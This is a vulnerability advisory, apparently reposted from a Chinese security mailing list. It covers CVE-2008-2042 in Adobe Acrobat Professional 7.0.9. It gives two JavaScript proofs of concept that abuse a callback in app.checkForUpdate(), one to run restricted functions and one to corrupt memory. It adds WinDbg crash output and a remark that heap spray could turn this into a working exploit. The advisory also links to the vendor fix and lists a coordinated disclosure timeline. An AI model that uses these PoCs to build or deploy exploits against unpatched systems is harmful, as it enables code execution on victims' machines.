Adobe Acrobat Professional Vulnerabilities

以下消息来自幻影论坛[Ph4nt0m]邮件组
 
Adobe Acrobat Professional Javascript For PDF Security Feature Bypass and Memory Corruption Vulnerabilities
 
by cocoruder(frankruder_at_hotmail.com)
[url]http://ruder.cdut.net[/url]

Summary:
    Two critical vulnerabilities exist in the javascript API of Adobe Acrobat Professional 7. A remote attacker who successfully exploits these vulnerabilities can execute restricted functions and arbitrary codes on the affected system.

Affected Software Versions:
    Adobe Acrobat Professional 7.0.9

   
Details:
    These two vulnerabilities specially exist in an unpublicized fucntion called "app.checkForUpdate()", which are exploited through a callback function.
   
    Following is the POC for how to execute restricted functions:
    function    myCallBack()
    {
        app.alert("It will call app.newDoc()");
        app.newDoc();
        app.alert("function has been called");
    }
    app.checkForUpdate
    ({
        cType:"AAAA",
        cName:"BBBB",
        oCallback:myCallBack,
        cVer:"CCCC",
        cMsg:"DDDD",
        oParams:myCallBack
    });

    As we know, when we call "app.newDoc()" normally, the function can not be executed because of the security feature of PDF's javascript, but the above code can still execute this function successfully, other restricted functions can also be executed by exploiting this vulnerability.
   
    The POC for triggering the memory corruption vulnerability:
    function    myCallBack()
    {
        app.alert("Corrupting the memory");
        // Open a new report will corrupt the memory
        var rep = new Report();
        app.alert("If the application has not been crashed, try to close the application and then you will get it.");
    }
    app.checkForUpdate
    ({
        cType:"AAAA",
        cName:"BBBB",
        oCallback:myCallBack,
        cVer:"CCCC",
        cMsg:"DDDD",
        oParams:myCallBack
    });

    When we call the function "new Report()"(other functions maybe useful too) in the function "Callback", it will corrupt the memory. Debug informations from Windbg as follows:
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=0946fb98 ebx=00000040 ecx=10101010 edx=0946fb90 esi=0946eaea edi=01c1dfbc
    eip=10101010 esp=0012f6cc ebp=0012f77c iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    exlang32+0x101010:
    10101010 001b            add     byte ptr [ebx],bl          ds:0023:00000040=??
    0:000> u eip
    exlang32+0x101010:
    10101010 001b            add     byte ptr [ebx],bl
    10101012 6c              ins     byte ptr es:[edi],dx
    10101013 0000            add     byte ptr [eax],al
    10101015 1b640000        sbb     esp,dword ptr [eax+eax]
    10101019 336000          xor     esp,dword ptr [eax]
    1010101c 0033            add     byte ptr [ebx],dh
    1010101e 60              pushad
    1010101f 0000            add     byte ptr [eax],al
    It is running codes at an unexpected address.
    Using the heap spray technology of javascript in PDF can develop a working exploit for this vulnerability easily. 
    Note that because the special API does NOT exist in Adobe Reader/Acrobat 8, as my test, the vulnerability does NOT affect Adobe Reader/Acrobat 8.

Solution:
    Adobe has released an advisory for this vulnerability which is available on:
    [url]http://www.adobe.com/support/security/bulletins/apsb08-13.html[/url]
    Fortinet advisory can be found at:
   
    [url]http://www.fortiguardcenter.com[/url]

CVE Information:
    CVE-2008-2042

Disclosure Timeline:
    2007.11.01        Vendor notified via email
    2007.11.02        Vendor responded
    2008.05.06        Coordinated public disclosure       

--EOF--

你可能感兴趣的:(职场,休闲,Acrobat,Vulnerabilities)